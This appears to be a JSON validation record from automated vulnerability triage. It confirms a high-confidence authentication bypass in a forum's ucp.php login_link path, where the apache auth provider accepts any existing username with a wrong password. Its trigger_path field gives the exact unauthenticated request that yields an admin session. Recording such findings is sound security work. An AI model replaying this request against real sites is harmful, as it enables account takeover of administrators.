{
  "claim_outcome": "confirmed",
  "claim_block_reason": null,
  "repro_result": "confirmed",
  "validated_surface": "api_remote",
  "evidence_scope": "production_path",
  "claimed_impact_class": "authz_bypass",
  "observed_impact_class": "authz_bypass",
  "exploitability_confidence": "high",
  "attacker_controlled_input": "auth_provider=apache request parameter, plus an HTTP Basic Authorization header whose username (PHP_AUTH_USER) is set to any existing username, e.g. admin; the password is deliberately wrong (x)",
  "trigger_path": "Single unauthenticated POST to ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1 with header Authorization: Basic base64(admin:x) and body login_username=admin&login_password=x&login=Login -> apache provider returns LOGIN_SUCCESS without password check -> session_create(admin user_id=2)",
  "end_to_end_target_reached": true,
  "sanitizer_used": false,
  "crash_observed": false,
  "read_write_primitive_observed": false,
  "exploit_chain_demonstrated": true,
  "blocking_mitigation": null,
  "inferred": false
}
